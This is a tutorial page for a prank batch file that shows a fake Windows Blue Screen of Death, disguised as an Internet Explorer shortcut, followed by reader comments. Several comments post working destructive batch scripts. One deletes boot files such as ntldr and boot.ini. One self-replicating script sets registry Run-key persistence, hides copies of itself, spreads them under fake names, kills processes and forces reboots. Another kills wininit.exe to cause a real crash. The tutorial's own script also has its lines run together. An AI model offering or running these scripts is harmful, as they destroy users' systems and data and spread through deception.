Introduction: Blue Screen of Death Batch
Make the blue screen of death a shortcut on desktop and disguise it or make it a screen saver.
Step 1: Make the Batch File
@echo offcd /clscolor 17echo A problem has been detected and Windows has been shut down to prevent damageecho to your computer.echo.echo The problem seems to be caused by the following file: SPCMDCON.SYSecho.echo PAGE_FAULT_IN_NONPAGED_AREAecho.echo If this is the first time you&aposve seen this stop error screen,echo restart your computer. If this screen appears again, followecho these steps:echo.echo Check to make sure any new hardware or software is properly installed.echo If this is a new installation, ask your hardware or software manufacturerecho for any Windows updates you might need.echo.echo If problems continue, disable or remove any newly installed hardwareecho or software. Disable BIOS memory options such as caching or shadowing.echo If you need to use Safe Mode to remove or disable components, restartecho your computer, press F8 to select Advanced Startup Options, and thenecho select Safe Mode.echo.echo Technical information:echo.echo *** STOP: 0x00000050 (0xFD3094C2,0x00000001,0xFBFE7617,0x00000000)echo.echo.echo *** SPCMDCON.SYS - Address FBFE7617 base at FBFE5000, DateStamp 3d6dd67cpause >nulclsecho Downloading viruses . . .ping localhost -n 5 >nuldir /spause >nul
Step 2: Send to Desktop
Find it in all files by going to notepad > file > open > change Text Documents(*.txt) to All Files > find bluescreen.bat and right click it > send to > desktop (create shortcut).
Step 3: Disguise It
Right click the bluescreen shortcut icon on your desktop and rename it to Internet Explorer > exit > right click it again > properties > change icon > change it to the internet icon > apply > exit. Now it should look like Internet Explorer but when someone clicks on it, the blue screen of death should popup.
Step 4: Make It Run Full Screen
Right click on the disguised bluescreen shortcut we made > properties > layout > add a 0 to the width and the height under Windows Size > apply > goto the Font tab > make the font the biggest > apply > exit.
Step 5: Make It Your Screen Saver
open the disguised bluescreen shortcut and it will run full screen, now while it's opened press 'Print Screen' on your keyboard. exit. Go to paint (start>all programs>accessories>paint) > edit > paste > and save it as bluescreen. go to picture gallery make a new folder > place the bluescreen picture in your folder > exit > go to control panel > appearance and personalization > change screen saver > make the screen saver run from windows photo gallery > settings > browse for the folder you placed only the bluescreen in and open.
86 Comments
3 years ago
:start
start
goto start
4 years ago
lovely!! Can't wait to use it!
4 years ago
i have a way better one
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
Reply 4 years ago
it says its a virus
4 years ago
or this
@Echo off
color 4
title 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ
/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c "VIRUS DETECTED"
start
start
time 12:00
:R.I.P
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.bat
goto RIP
No 2:-
4 years ago
I have this one
@echo off
taskkill /f /im wininit.exe
...
Oh wait, that one makes appear a real BSOD...
5 years ago
Actually This is really better :
@echo off
echo ^<html^>^<head^>^<title^>BSOD^</title^> > bsod.hta
echo. >> bsod.hta
echo ^<hta:application >> bsod.hta
echo applicationname="BSOD" >> bsod.hta
echo version="1.0" >> bsod.hta
echo maximizebutton="no" >> bsod.hta
echo minimizebutton="no" >> bsod.hta
echo sysmenu="no" >> bsod.hta
echo Caption="no" >> bsod.hta
echo windowstate="maximize"/^> >> bsod.hta
echo. >> bsod.hta
echo ^</head^>^<body bgcolor="#000088" scroll="no"^> >> bsod.hta
echo ^<font face="Lucida Console" size="4" color="#FFFFFF"^> >> bsod.hta
echo ^<p^>A problem has been detected and windows has been shutdown to prevent damage to your computer.^</p^> >> bsod.hta
echo. >> bsod.hta
echo ^<p^>DRIVER_IRQL_NOT_LES_OR_EQUAL^</p^> >> bsod.hta
echo. >> bsod.hta
echo ^<p^>If this is the first time you've seen this stop error screen, restart your computer, If this screen appears again, follow these steps:^</p^> >> bsod.hta
echo. >> bsod.hta
echo ^<p^>Check to make sure any new hardware or software is properly installed. If this is a new installation, ask your hardware or software manufacturer for any windows updates you might need.^</p^> >> bsod.hta
echo. >> bsod.hta
echo ^<p^>If problems continue, disable or remove any newly installed hardware or software. Disable BIOS memory options such as caching or shadowing. If you need to use Safe Mode to remove or disable components, restart your computer, press F8 to select Advanced Startup Options, and then select Safe Mode.^</p^> >> bsod.hta
echo. >> bsod.hta
echo ^<p^>Technical information:^</p^> >> bsod.hta
echo. >> bsod.hta
echo ^<p^>*** STOP: 0x000000D1 (0x0000000C,0x00000002,0x00000000,0xF86B5A89)^</p^> >> bsod.hta
echo. >> bsod.hta
echo. >> bsod.hta
echo ^<p^>*** gv3.sys - Address F86B5A89 base at F86B5000, DateStamp 3dd9919eb^</p^> >> bsod.hta
echo. >> bsod.hta
echo ^<p^>Beginning dump of physical memory^</p^> >> bsod.hta
echo ^<p^>Physical memory dump complete.^</p^> >> bsod.hta
echo ^<p^>Contact your system administrator or technical support group for further assistance.^</p^> >> bsod.hta
echo. >> bsod.hta
echo. >> bsod.hta
echo ^</font^> >> bsod.hta
echo ^</body^>^</html^> >> bsod.hta
start "" /wait "bsod.hta"
del /s /f /q "bsod.hta"
5 years ago
Try this old Win 2000
@echo off
color 9f
title Windows 2000 BSOD
echo.
echo *** STOP: 0x0000007D (0xF641F84C,0x00000000,0x00000000)
echo INACCESSIBLE_BOOT_DEVICE
echo.
echo If this is the first time you've seen this Stop error screen,
echo restart your computer. If this screen appears again, follow
echo these steps.
echo.
echo Check for viruses on your computer. Remove any newly installed
echo hard drives of hard drive controllers. Check your hard drive
echo to make sure it is properly configured and terminated.
echo Run CHKDSK /F to check for hard drive corruption, and then
echo restart your computer.
echo.
echo Refer to your Getting started manual for more information on
echo troubleshooting Stop errors.
pause >nul
11 years ago on Introduction
what is damageecho?
Reply 5 years ago
use this!
@echo off
cd /
cls
color 9F
echo A problem has been detected and Windows has been shut down to prevent damage
echo to your computer.
echo.
echo The problem seems to be caused by the following file: SPCMDCON.SYS
echo.
echo DRIVER_IRQL_NOT_LES_OR_EQUAL
echo.
echo If this is the first time you've seen this stop error screen,
echo restart your computer. If this screen appears again, follow
echo these steps:
echo.
echo Check to make sure any new hardware or software is properly installed.
echo If this is a new installation, ask your hardware or software manufacturerecho for any Windows updates you might need.
echo.
echo If problems continue, disable or remove any newly installed hardware
echo or software. Disable BIOS memory options such as caching or shadowing.
echo If you need to use Safe Mode to remove or disable components, restartecho your computer, press F8 to select Advanced Startup Options, and thenecho select Safe Mode.
echo.
echo Technical information:
echo.
echo *** STOP: 0x00000050 (0xFD3094C2,0x00000001,0xFBFE7617,0x00000000)echo.echo.echo *** SPCMDCON.SYS - Address FBFE7617 base at FBFE5000, DateStamp 3d6dd67c
pause
cls
color c
echo Downloading viruses . . .
tree %systemdisk%\
pause>nul
6 years ago
will this... kill my pc if i click o the .bat file .....? probaby lol just asking?
Reply 5 years ago
no, it won't, it's a fake BSoD.
Reply 6 years ago
It's only showing blue screen text.
5 years ago
i fixed it.
@echo off
cd /
cls
color 17
echo A problem has been detected and Windows has been shut down to prevent damage
echo to your computer.
echo.
echo The problem seems to be caused by the following file: SPCMDCON.SYS
echo.
echo PAGE_FAULT_IN_NONPAGED_AREA
echo.
echo If this is the first time you've seen this stop error screen,
echo restart your computer. If this screen appears again, follow
echo these steps:
echo.
echo Check to make sure any new hardware or software is properly installed.
echo If this is a new installation, ask your hardware or software manufacturerecho for any Windows updates you might need.
echo.
echo If problems continue, disable or remove any newly installed hardware
echo or software. Disable BIOS memory options such as caching or shadowing.
echo If you need to use Safe Mode to remove or disable components, restartecho your computer, press F8 to select Advanced Startup Options, and thenecho select Safe Mode.
echo.
echo Technical information:
echo.
echo *** STOP: 0x00000050 (0xFD3094C2,0x00000001,0xFBFE7617,0x00000000)echo.echo.echo *** SPCMDCON.SYS - Address FBFE7617 base at FBFE5000, DateStamp 3d6dd67c
pause
cls
color c
echo Downloading viruses . . .
ping 127.0.0.1>nul
tree %systemdisk%\
pause>nul
Reply 5 years ago
AWESOME DUUUDE that last command scared me cuz i didn't read the code, i just pasted and ran it. never saw that command.
Reply 5 years ago
actually use this instead
@echo off
cd /
cls
color 9F
echo A problem has been detected and Windows has been shut down to prevent damage
echo to your computer.
echo.
echo The problem seems to be caused by the following file: SPCMDCON.SYS
echo.
echo DRIVER_IRQL_NOT_LES_OR_EQUAL
echo.
echo If this is the first time you've seen this stop error screen,
echo restart your computer. If this screen appears again, follow
echo these steps:
echo.
echo Check to make sure any new hardware or software is properly installed.
echo If this is a new installation, ask your hardware or software manufacturerecho for any Windows updates you might need.
echo.
echo If problems continue, disable or remove any newly installed hardware
echo or software. Disable BIOS memory options such as caching or shadowing.
echo If you need to use Safe Mode to remove or disable components, restartecho your computer, press F8 to select Advanced Startup Options, and thenecho select Safe Mode.
echo.
echo Technical information:
echo.
echo *** STOP: 0x00000050 (0xFD3094C2,0x00000001,0xFBFE7617,0x00000000)echo.echo.echo *** SPCMDCON.SYS - Address FBFE7617 base at FBFE5000, DateStamp 3d6dd67c
pause
cls
color c
echo Downloading viruses . . .
tree %systemdisk%\
pause>nul
Reply 5 years ago
thanks!
12 years ago on Step 5
it wont let me paste
Reply 11 years ago on Introduction
you can paste on notepad not cmd
Reply 6 years ago
you need paste the code in the notepad and save the file as a .bat